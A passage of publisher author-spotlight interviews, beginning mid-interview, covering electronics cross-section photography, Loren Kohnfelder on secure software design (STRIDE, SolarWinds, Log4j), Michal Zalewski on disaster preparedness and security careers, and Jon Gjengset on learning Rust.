NSP: Windell—unlike a cross-section illustration, capturing everything inside an object with a single photograph in a single frame had to be difficult at times. Can you give us some examples where you had to get creative to get the shot?

WO: One of the basic limitations that you can run into with macro photography is the limited depth of field—only a very narrow slice of the view is in focus at any given time. We used focus-stacking software to digitally combine pictures taken at different camera positions, stitching them together like a panorama where the entire subject is sharp and in focus. The circuit-board photograph on the front cover of the book was taken this way. Other times, the subject itself can just be plain hard to photograph.

For some of the LEDs, like the surface-mount LED on page 90, we took photos at different exposure levels and composited them (in a basic HDR—high dynamic range—process) so that you can see detail even in the brightly lit LED. For the color sensor on page 81, the photos came out drab until we added an additional light source at just the right position and brightness so that you could see the additional reflection.

 

NSP: How did you decide what samples and images ultimately made it into the book?

ES: During endless hours of video chat we discussed every potential sample and made a highly detailed spreadsheet. We’re both very organized.

WO: Some part of it was determined by which things we could get our hands on—there are probably 50 other things in the spreadsheet that we might have included if we had an example to disassemble. We did skip a number of potential subjects that were too similar to others, too difficult to section, too difficult to photograph, or that were less likely to be of general interest.

 

NSP: Anyone who’s into photography knows that what’s pleasing to the eye is not always pleasing to the lens. Were there any samples that you successfully cross-sectioned but just could not get a good photo of—things you left on the cutting-room floor, as it were?

WO: Yes, there were quite a few actually, including some that we put a lot of time into preparing. A good example is a reed relay, where we just couldn’t get a photo that clearly showed the features that we wanted to highlight.

 

NSP: Given that you both have backgrounds in hardware engineering—and professional tinkering in general—did you know in advance which electronic components would look cool from a cross-cutting perspective, or was there a lot of trial and error? Any surprises along the way, good or bad?

ES: I’ve seen a few component cross sections created for failure-analysis purposes, so I knew about certain components that would look good, but there were definitely a few surprises. We thought an RGB LED would look cool, but after cutting into one, it just didn’t really seem interesting. We took apart a boring-looking gray electronics module that turned out to be a fabulously complex jewel—the isolation amplifier (page 266).

WO: One of my favorites that took some experimentation was the multilayer ceramic capacitor (page 36). There’s never been any mystery about what is in one—stacked layers of metal electrodes—but it took us a lot of experimentation and cutting into different capacitors to find one where you could literally see and count the individual layers. There were definitely real surprises along the way. The way that the rocker DIP switch (page 110) works inside is just stunning elegance.

 

NSP: You include a “Retro Tech” section in the book for your vintage finds, like Nixie tubes, a mercury tilt switch, and even a magnetic tape head. From a purely aesthetic standpoint, which era wins (Old vs. Modern) as far as microscale interior design goes?

ES: They both fascinate me. Vintage components seem warm and natural to me, being made of less processed materials like brass, rubber, mica, and glass. Modern parts have a sort of cold Cartesian precision and a microscopic intricacy.

WO: Modern electronics has so much more to offer in interior design—there’s just so much more inside. If we were talking about exterior design, I’ll pick the vintage. I love all the brass and Bakelite.

 

NSP: Windell, your company’s motto is “Making the World a Better Place, One Evil Mad Scientist at a Time.” If you had to come up with a similar motto for your book, what would it be? I’ll go first: “Making the garage a messier place, one experiment at a time!” . . . I guess what I’m getting at is, what effect do you hope your work in this book has on people? Eric, same question for you.

WO: If the book needed a motto, other than our existing subtitle, I’d pick “Showing you the Hidden Wonders Inside Electronics.” I hope that it inspires people to open up their electronics and look inside. To look at the parts for the little clues about how they’re made, what they’re for, and how they work. To appreciate elegant design, where they weren’t looking for it before.

ES: I want to inflame curiosity. Earlier today my very young nephew was totally absorbed in a copy of the book, asking his mother afterwards if they had any circuits he could play with. The world is a better place with curious people living in it.

 

Redesigning Security with Living-Legend Loren Kohnfelder


This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.

DesigningSecureSoftware coverLoren Kohnfelder

Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, detailing the concepts behind his personal perspective on technology (which can also be found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security-experts.


No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-ID model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service and Elevation of privileges), and you helped bake security-design reviews into the development process at Google—all of which are key growth spurts in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg first invented it in the late ’90s. Pretty remarkable that something started in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune from obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we now have pervasive internet connectivity, exponential growth in compute power and storage, cloud computing, and software itself is vastly more complex. All of these changes have grown the attack surface—plus our greater reliance on digital systems, as well as the massive amounts of data in the world, serve to increase motivation for attackers. For all of these reasons, threat modeling is more important than ever to gain a proactive view of the threat landscape for the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover the only threats software needs to be concerned with, especially now that we have IoT, robots, and self-driving cars that directly act in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats for systems interacting with people and machines in powerful ways.

 

NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software in the first place to review. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both approaches.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.

 

NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

Again, this is a different viewpoint worth considering in addition to, not instead of, the usual. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more facile at the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned for identifying these potential vulnerabilities.

 

NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of exactly what actually happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, that are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks products foresee and how they are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures, and also ensure that it's the latest version available, before trusting any code, and of course promptly install future updates that fix critical issues.

 

NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static in nature. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities are higher than the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)

 

NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms that improve safety in, say, the features of APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, too often I think the connection to vulnerabilities is under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of just these common pitfalls in a little over 100 pages, so I won't attempt to summarize all that here.

If your question about root causes goes deeper, asking why programming languages and API are so prone to security problems, then I would say it's often simply because the practice of software development goes back before there was much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem, and threats like ransomware. The same goes for API, which can fail to anticipate evolving threats that, once distributed, are very hard to fix later.

Another common cause in API design is failing to present a clean interface, in terms of trust relationship and security responsibility. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for a mistake to arise. So it's imperative for the API documentation to provide clear security commitments, or detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—that they may not even have been aware of—offered attackers an attractive point of entry.

 

NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library used by millions of applications, that has a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designer(s) recognized the threat or not, mitigated insufficiently, or simply failed to understand the consequences, is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is nearly a Perfect Storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than strings with escape sequences that got Log4j into trouble.

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of material (that would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that’d help. (I posted about Log4j at more length last year when it first became public.)

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.

 

The End Is (Not) Nigh: Disaster Prepping with Michal Zalewski


For our first Author Spotlight interview of 2022, we have illustrious guest Michal Zalewski—world-class security researcher and author of the newly released Practical Doomsday: A User’s Guide to the End of the World. In the following Q&A, we talk with him about taking disaster preparedness back from the fringe, what he's learned from living through numerous calamities, the reason hackers have the edge over doomsday preppers in any real emergency, and why he’s got a solid backup plan “if this whole computer thing turns out to be a passing fad.”

Practical Doomsday cover Michal Zalewski avatar

Michal Zalewski (aka lcamtuf) has been the VP of Security & Privacy Engineering at Snap Inc. since 2018, following an 11-year stint at Google, where he built the product security program and helped set up a seminal bug bounty initiative. Originally hailing from Poland, he kick-started his career with frequent BugTraq posts in the ’90s, and went on to identify and publish research on hundreds of notable security flaws in the browsers and software powering our modern internet. In addition to his influence on the tech industry, Zalewski's known as the developer of the American Fuzzy Lop open-source fuzzer and other tools. He's also the author of two classic security books via No Starch Press, The Tangled Web (2011) and Silence on the Wire (2005), and is a recipient of the prestigious Lifetime Achievement Pwnie Award.


NSP: Gratulacje on your new book, Michal! Suffice it to say, a practical prep guide for doomsday scenarios could not be more timely (...all things considered). You even joke on Twitter that the past few years were an elaborate viral marketing campaign for the book’s release. But in fact, you’ve been writing on this subject since at least 2015. What first lured you into the disaster-preparedness genre?

Michal Zalewski: I keep asking myself the same question! For one, I simply grew up at an interesting time and in an interesting place: in a failed Soviet satellite state going through a period of profound political and economic strife. As a child, I didn’t think of it much, but as an adult, I look at my early years with a degree of terror and awe.

I also have this geeky curiosity about how complex systems work and how they might fail—and to be frank, I can’t quite grasp why we look at this problem so differently in the physical world versus the digital realm. After all, it’s normal to back up our files or use antivirus software; why is it wacky to buy fire extinguishers for one’s home or store several gallons of water and some canned food?

In my mind, risk modeling and common-sense preparations shouldn’t be a political issue and shouldn’t be the domain of people who are convinced that the end is nigh. If anything, having a backup plan is a wonderful way to dispel some of the worries and anxieties of everyday life.
 

NSP: Your personal bio illustrates one of the key points in the book—that disasters are not rare. In addition to growing up in Poland in the '80s, the book also brings up the experience of living through 9/11, the dot-com crash, and the housing crisis of 2008. Would you explain that larger theme within the context of your own trials and tribulations?

MZ: Oh, I don’t want to oversell my life story! My experiences are shared by tens of millions of people around the globe. Countless others have lived through much worse— famine, devastating natural disasters, wars.

I’m going to say one thing, though. Living through a sufficient number of calamities reveals a simple truth: that every generation gets to experience their own “winter of the century,” “recession of the century,” “pandemic of the century,” and so on. And every time, such events catch them off guard.

In most cases, it’s not a matter of life and death; most people make it through recessions, wildfires, and floods. But having a robust plan can make the situation much less stressful, and can make the recovery more certain and more swift.
 

NSP: Most people picture doomsday preppers as ex-military survivalist-types—not a self-described “city-raised computer nerd.” How has your hacker background informed the emergency-preparedness thought process you’re teaching readers in the book?

MZ: If there’s one obvious difference, it’s that in the physical realm, life-threatening incidents are fairly rare. In the world of computing, on the other hand, networks and applications are under constant attack. When you work in this domain, I think you start to appreciate the saying attributed to Mike Tyson: “everyone has a plan until they get punched in the mouth”— that is, theory seldom survives the clash with reality. By the end of the day, the surest way to get through an emergency is to be adaptable and resilient, not to have an impressive stockpile guns and bushcraft tools.

Another principle I picked up from the world of information security is that there is no limit to how much time, effort, and money you can spend in the pursuit of perfection—but perfection is not necessarily a useful goal. A good preparedness strategy needs to zero in on problems that are important, plausible, and can be addressed in a cost-effective way, without jeopardizing your quality of life should the apocalypse not come.
 

NSP: As a teenager, you became active in Europe’s fledgling infosec community, which led to consulting projects, pentesting gigs and, eventually, a remarkable career in the industry. Based on your own success, what do you think it takes to truly succeed in the infosec field and/or what’s your best career advice for aspiring security researchers?

MZ: I try to be careful with career advice—sometimes, people are successful despite their habits, not because of them. That said, I certainly found it helpful to always approach security in a bottom-up fashion. If you make the effort to understand how the underlying technologies really work, their failure modes become fairly self-evident too.

My best advice for aspiring professionals is different, though: perhaps the most underrated skill in tech are solid writing skills. That’s because technical prowess is not sufficient to succeed—you need to get others on board. I have a short Twitter thread with a handful of tips here.
 

NSP: In addition to your street cred in the security world, you’re credited with (inadvertently) helping hackerdom in another realm entirely—Hollywood. The Matrix Reloaded is lauded as the first major motion picture to accurately portray a hack. More specifically, your hack. For those who haven’t seen it, Trinity uses an Nmap port scan, followed by an SSH exploit to break into a power company and disable the city’s electric grid. In 2001, you discovered the SSH bug being depicted on screen. Can you tell us anything about your vulnerability report being in one of the movie’s most pivotal scenes?

MZ: I wish I had a cool story to tell! I was surprised (and flattered) to see my bug on the big screen. My other cinematic claim to fame is having my fuzzer—American Fuzzy Lop—surface in the TV series Mr. Robot.

Of course, my screen credits pale in comparison with the track record of the aforementioned NMap tool. The network scanner makes an appearance in at least a dozen films and TV series, reportedly including at least one porn flick.
 

NSP: In an example of life imitating art, the intelligence community has recently sounded the alarm over an “unprecedented” uptick in hackers targeting electric grids. Maybe if the fictional power company in The Matrix Reloaded had someone like you working for them, Trinity’s blackout-inducing exploit would have failed—which begs the question: do you think white-hat hackers could be the answer to the risk that APTs pose to critical infrastructure? Is it as simple as utility providers adopting bug-bounty bounty programs, such as the one your team launched at Google a decade ago?

MZ: Bug bounties are a cherry on top for a mature security program: they are a last-resort mechanism to catch a fraction of mistakes that slip past your internal defenses. But if you’re routinely letting vulnerabilities ship to production and then hope that talented strangers will catch them all, you’re playing a very dangerous game.

A comprehensive security program starts with minimizing the risk of such mistakes in the first place: building automation that makes it easy to do the right thing and difficult for humans to mess up. The second layer of defense are internal processes for vetting the design and implementation of your systems, and for penetration-testing or fuzzing the products before they go out the door.

Still, the problem faced by most utilities isn’t related to any of this: it’s that we have a fairly small pool of infosec talent and that companies are fiercely competing for that talent. The Wyoming Rural Electric Association doesn’t have it easy when even the most junior security engineer can land an interview with Amazon, Goldman Sachs, or SpaceX.
 

NSP: From your early years posting software vulnerabilities on BugTraq, to your research exposing the flawed security models of web browsers, to helping Google build its massive product security program, you've become known as one of the most influential people in infosec. Over the same decades, the internet has gone from a place of dial-up connections and friendly message-boards to a global network that governs nearly every aspect of digital society. Given your unique vantage point in this regard, what do you think is the most pressing challenge in the industry today?

MZ: I'm not an infosec malcontent—I think our industry has made impressive progress when it comes to reasoning about and reducing the risk of most types of security flaws. But as you note, the stakes are getting higher too: nowadays, almost everything is connected to the internet, and even the humble thermostat on your wall might be running more than ten millions lines of code. This makes absolute security a rather challenging goal.

In light of this, the two keywords that come to mind are "compartmentalization" and "containment." You have to plan for unavoidable mishaps and must have a way to prevent them from turning into disasters. For enterprises, this may involve dividing systems into smaller, well-understood blocks that can be cordoned off and monitored for anomalies with ease. The technologies and the architecture paradigms that make this possible are still in their infancy, but I think they hold a lot of promise.

Of course, we can practice compartmentalization and containment in everyday life, too. Perhaps only so much in your life should depend on the security of a single email provider or a single bank.
 

NSP: Last question! One of the prepper commandments in your book is, simply, “Learn new skills.” Why is this important for building a comprehensive disaster-preparedness plan, and what are some useful secondary skills that you have developed outside of infosec?

MZ: The point I make in the book is that the accelerating pace of technological change means that fewer and fewer jobs are for life. You know, in the 1990s, opening a VHS rental place or a music store was a sound business plan, journalism was a revered and well-paying gig, and the photographic film industry was a behemoth that consumed about a third of the global silver supply. We are probably going to see similar shifts in the coming decades. In particular, I’m not at all convinced that software engineers are still going to be an elite profession in 20-30 years.

It’s hard to predict the future, but it’s possible to hedge our bets—say, by pursuing potentially marketable hobbies on the side. Even if nothing happens, such pursuits are still rewarding on their own. I enjoy woodworking and tinkering with electronics. I could probably turn these hobbies into gainful employment if this whole computer thing turns out to be a passing fad.
 


*Use coupon code SPOTLIGHT30 to get 30% off your order of Practical Doomsday through March 9, 2022.
 

Live Coder Jon Gjengset Gets into the Nitty-Gritty of Rust


Our always fascinating Author Spotlight series continues with Jon Gjengset – author of Rust for Rustaceans. In the following Q&A, we talk with him about what it means to be an intermediate programmer (and when, exactly, you become a Rustacean), how Rust “gives you the hangover first” for your code's own good, why getting over a language's learning curve sure beats reactive development, and how new users can help move the needle toward a better Rust.

Rust for Rustaceans cover Jon Gjengset headshot

A former PhD student in the Parallel and Distributed Operating Systems group at MIT CSAIL, Gjengset is a senior software engineer at Amazon Web Services (AWS), with a background in distributed systems research, web development, system security, and computer networks. At Amazon, his focus is on driving adoption of Rust internally, including building out internal infrastructure as well as interacting with the Rust ecosystem and community. Outside of the 9-to-5, he conducts live coding sessions on YouTube, is working on research related to a new database engine written in Rust, and shares his open-source projects on GitHub and Twitter.


No Starch Press: Congratulations on your new book! Everyone digs the title, Rust for Rustaceans – which is a tad more fitting than its original moniker, Intermediate Rust. I only bring this up because both names speak to who the book is for. Let’s talk about that. What does “intermediate'' mean to you in terms of using Rust? Specifically, what gap does your book fill for those who may have finished The Rust Programming Language, and are now revving to become *real* Rustaceans?

Jon Gjengset: Thank you! Yeah, I’m pretty happy with the title we went with, because as you’re getting at, the term “intermediate” is not exactly well-defined. In my mind, intermediate encapsulates all of the material that you wouldn’t need to know or feel comfortable digging into as a beginner to the language, but not so advanced that you’ll rarely run into it when you get to writing Rust code in the wild. Or, to phrase it differently, intermediate to me is the union of all the stuff that engineers working with Rust in real situations would pick up and find continuously useful after they’ve read The Rust Programming Language.

I also want to stress that the book is specifically not titled "The Path to Becoming a Rustacean," or anything along those lines. It’s not as though you’re not a real Rustacean until you’ve read this book, or that the knowledge the book contains is something every Rustacean knows. Quite the contrary – in my mind, you are a Rustacean from just before the first time you ask yourself whether you might be one, and it’s at that point you should consider picking up this book, whenever that may be. And for most people, I would imagine that point comes somewhere around two thirds through The Rust Programming Language, assuming you’re trying to actually use the language on the side.
 

NSP: Rust has been voted “the most loved language” on Stack Overflow for six years running. That said, it's also gained a reputation for being harder to learn than other popular languages. What do you tell developers who are competent in, say, Python but hesitant to try Rust because of the perceived learning curve?

JG: Rust is, without a doubt, a more difficult language to learn compared to its various siblings and cousins, especially if you’re coming from a different language that’s not as strict as Rust is. That said, I think it’s not so much Rust that’s hard to learn as it is the principles that Rust forces you to apply to your code. If you’re writing code in Python, to use your example, there are a whole host of problems the language lets you get away with not thinking about – that is, until they come back to bite you later. Whether that comes in the form of bugs due to dynamic typing, concurrency issues that only crop up during heavy load, or performance issues due to lack of careful memory management, you’re doing reactive development. You build something that kind of works first, and then go round and round fixing issues as you discover them.

Rust is different because it forces you to be more proactive. An apt quote from RustConf this year was that Rust “gives you the hangover first” – as a developer you’re forced to make explicit decisions about your program’s runtime behavior, and you’re forced to ensure that fairly large classes of bugs do not exist in your program, all before the compiler will accept your source code as valid. And that’s something developers need to learn, along with the associated skill of debugging at compile time as opposed to at runtime, as they do in other languages.

It’s that change to the development process that causes much of (though not all of) Rust’s steeper learning curve. And it’s a very real and non-trivial lesson to learn. I also suspect it’ll be a hugely valuable lesson going forward, with the industry’s increased focus on guaranteed correctness through things like formal verification, which only pushes the developer experience further in this direction. Not to mention that the lessons you pick up often translate back into other languages. When I now write code in Java, for instance, I am much more cognizant of the correctness and performance implications of that code because Rust has, in a sense, taught me how to reason better about those aspects of code.
 

NSP: In the initial 2015 release announcement, Rust creator Graydon Hoare called it “technology from the past come to save the future from itself.” More recently, Rust evangelist Carol Nichols described it as “trying to learn from the mistakes of C, and move the industry forward.” To give everyone some context for these sentiments, tell us what sets Rust apart safety-wise from “past” systems languages – in particular, C and C++ – when it comes to things like memory and ownership.

JG: I think Rust provides two main benefits over C and C++ in particular: ergonomics and safety. For ergonomics, Rust adopted a number of mechanisms traditionally associated with higher-level languages that make it easier to write concise, flexible, (mostly) easy-to-read, and hard-to-misuse code and interfaces – mechanisms like algebraic data types, pattern matching, fairly powerful generics, and first-class functions. These in turn make writing Rust feel less like what often comes to mind when we think about system programming – low-level code dealing just with raw pointers and bytes – and makes the language more approachable to more developers.

As for safety, Rust encodes more information about the semantics of code, access, and data in the type system, which allows it to be checked for correctness at compile-time. Properties like thread safety and exclusive mutability are enforced at the type-level in Rust, and the compiler simply won’t let you get them wrong. Rust’s strong type system also allows APIs to be designed to be misuse-resistent through typestate programming, which is very hard to pull off in less strict languages like C.

Rust’s choice to have an explicit break-the-glass mechanism in the form of the unsafe keyword also makes a big difference, because it allows the majority of the language to be guaranteed-safe while also allowing low-level bits to stay within the same language. This avoids the trap of, say, performance-sensitive Python programs where you have to drop to C for low-level bits, meaning you now need to be an expert in two programming languages! Not to mention that unsafe code serves as a natural audit trail for security reviews!
 

NSP: Along those same lines, Rust (like Go and Java) prevents programmers from introducing a variety of memory bugs into their code. This got the attention of the Internet Security Research Group, whose latest project, Prossimo, is endeavoring to replace basic internet programs written in C with memory-safe versions in Rust. Microsoft has also been very vocal about their adoption of Rust, and Google is backing a project bringing Rust to the Linux kernel underlying Android. As Rust is increasingly embraced and used for bigger and bigger projects, are there any niche or large-scale applications, or certain technology combos you’re most excited about?

JG: Putting aside the discussion about whether Rust prevents the same kinds of bugs in the same kinds of ways as languages like Go and Java, it’s definitely true that the move to these languages represent a significant boost to memory safety. And I think Rust in particular unlocked another segment of applications that would previously have been hard to port, such as those that would struggle to operate with a language runtime or automated garbage collection.

For me, some of the most exciting trajectories for Rust lie in its interoperability with other systems and languages, such as making Rust run on the web platform through WASM, providing a better performance-fallback for dynamic languages like Ruby or Python, and allowing component-by-component rewrites in established existing systems like cURL, Firefox, and Tor. The potential for adoption of Rust in the kernel is also very much up there if it might make kernel development more approachable than it currently is – kernel C programming can be very scary indeed, which means fewer contributors dare try.
 

NSP: In the book’s foreword, David Tolnay – a prolific contributor to the language, who served as your technical reviewer – says that he wants readers to “be free to think that we got something wrong in this book; that the best current guidance in here is missing something, and that you can accomplish something over the next couple years that is better than what anybody else has envisioned. That’s how Rust and its ecosystem have gotten to this point.” The community-driven development process he’s referencing is somewhat unique to Rust and its evolution. Could you briefly explain how that works?

JG: I’m very happy that David included that in his foreword, because it resonates strongly with me coming from a background in academia. The way we make progress is by constantly seeking to find new and better solutions, and questioning preconceived notions of what is and isn’t possible, or how things “should” be done. And I think that’s part of how Rust has managed to address as many pain points as it does. The well-known Rust adage of “fast, reliable, productive, pick three” is, in some sense, an embodiment of this sentiment – let’s not accept the traditional wisdom that this is a fundamental trade-off, and instead put in a lot of work and see if there’s a better way.

In terms of how it works in practice, my take is that you should always seek to understand why things are the way they are. Why is this API structured this way? Why doesn’t this type implement Send? Why is static required here? Why does the standard library not include random number generation? Often you’ll find that there is a solid and perhaps fundamental underlying reason, but other times you may just end up with more questions. You might find an argument that seems squishy and soft, and as you start poking at it you realize that maybe it isn’t true anymore. Maybe the technology has improved. Maybe new algorithms have been developed. Maybe it was based on a faulty assumption to begin with. Whatever it may be, the idea is to keep pulling at those threads in the hope that at the other end lies some insight that allows you to make something better.

The end result could be an objectively better replacement for some hallmark crate in the ecosystem, an easing of restrictions in the type system, or a change to the recommended way to write code – all of which move the needle along towards a better Rust. That sentiment's best summarized by David Tolnay’s self-quote from 2016: “This language seems neat but it's too bad all the worthwhile libraries are already being built by somebody else.”
 

NSP: Alumni of the Rust Core team have said that it’s a systems language designed for the next 40 years – quite an appealing hook for businesses and organizations that want their fundamental code base to be usable well into the future. What are some of the key design decisions that have made Rust, in effect, built to last?

JG: Rust takes backwards compatibility across versions of the compiler very seriously, and the intent is that (correct) code that compiled with an older version of the compiler should continue to compile indefinitely. To ensure this, larger changes to the language are tested by re-building all versions of all crates published to crates.io to check that there are no regressions. Of course, the flip side of backwards compatibility is that it can be difficult to make improvements to the language, especially around default behavior.

The Rust project’s idea to bridge this divide is the “edition” system. At its core, the idea is to periodically cut new Rust editions that crates can opt into to take advantage of the latest non-backwards-compatible improvements, but with the promise that crates using different editions can co-exist and interoperate, and that old editions will continue to be supported indefinitely. This necessarily limits what changes can be made through editions, but so far it has proven to be a good balance between “don’t break old stuff” and “enable development of new stuff” that is so vital to a language’s long-term health.

The Rust community’s commitment to semantic versioning also underpins some of Rust’s long-term stability promises – that is, by allowing crates to declare through their version number when they make breaking changes, Rust can ensure that even as dependencies change, their dependents will continue to build long into the future (though potentially losing out on improvements and bug fixes as old versions stop being maintained).
 

